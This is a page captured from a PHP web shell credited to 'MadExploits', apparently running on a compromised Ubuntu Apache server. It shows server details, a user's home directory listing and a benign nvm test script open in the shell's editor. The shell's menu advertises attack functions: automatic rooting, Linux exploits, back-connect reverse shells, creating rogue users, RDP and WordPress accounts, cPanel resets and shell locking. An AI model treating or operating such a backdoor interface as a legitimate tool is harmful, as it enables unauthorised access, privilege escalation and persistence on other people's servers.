Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
rohit20538 /
.nvm /
test /
installation_node /
[ HOME SHELL ]
Name
Size
Permission
Action
default-packages
2.6
KB
-rwxr-xr-x
install LTS
1.26
KB
-rwxr-xr-x
install already installed uses...
705
B
-rwxr-xr-x
install from binary
678
B
-rwxr-xr-x
install from binary with binar...
1.33
KB
-rw-r--r--
install from source
834
B
-rwxr-xr-x
install from source with threa...
950
B
-rwxr-xr-x
install from source without V8...
762
B
-rwxr-xr-x
install hook
1.37
KB
-rwxr-xr-x
install latest npm
2.38
KB
-rwxr-xr-x
install on bash with ERR trap ...
1005
B
-rwxr-xr-x
install two versions and use t...
682
B
-rwxr-xr-x
install version specified in ....
510
B
-rwxr-xr-x
install while reinstalling pac...
1.53
KB
-rwxr-xr-x
install with --alias
244
B
-rwxr-xr-x
install with --default
251
B
-rwxr-xr-x
install with --latest-npm
269
B
-rwxr-xr-x
setup_dir
62
B
-rwxr-xr-x
teardown_dir
268
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install on bash with ERR trap and set -E
#!/bin/sh set -e cleanup() { nvm cache clear nvm deactivate rm -rf "${NVM_DIR}"/v* nvm unalias default } die() { echo "$@" cleanup || true exit 1 } \. ../../nvm.sh if [ -z "${BASH-}" ]; then echo "This test only applies to Bash; skipping" exit fi cleanup || true trap 'echo "==> EXIT signal received (status: $?)"; cleanup' EXIT # shellcheck disable=SC3047 trap 'echo "==> ERR signal received"; exit 1' ERR # shellcheck disable=SC3041 set -E # shellcheck disable=SC3045,SC3047 ERR_TRAP_EXPECTED="$(trap -p ERR)" # Adding ` || die 'install failed'` implicitly disables error handling and # prevents ERR trap execution, so for the purposes of this test, `nvm install` # can't be part of another command or statement nvm install node case "$-" in *E*) # shellcheck disable=SC3045,SC3047 [ "$(trap -p ERR)" = "$ERR_TRAP_EXPECTED" ] || die "ERR trap not restored after \"nvm install $VERSION\"" ;; *) die "errtrace not restored after \"nvm install $VERSION\"" ;; esac
Close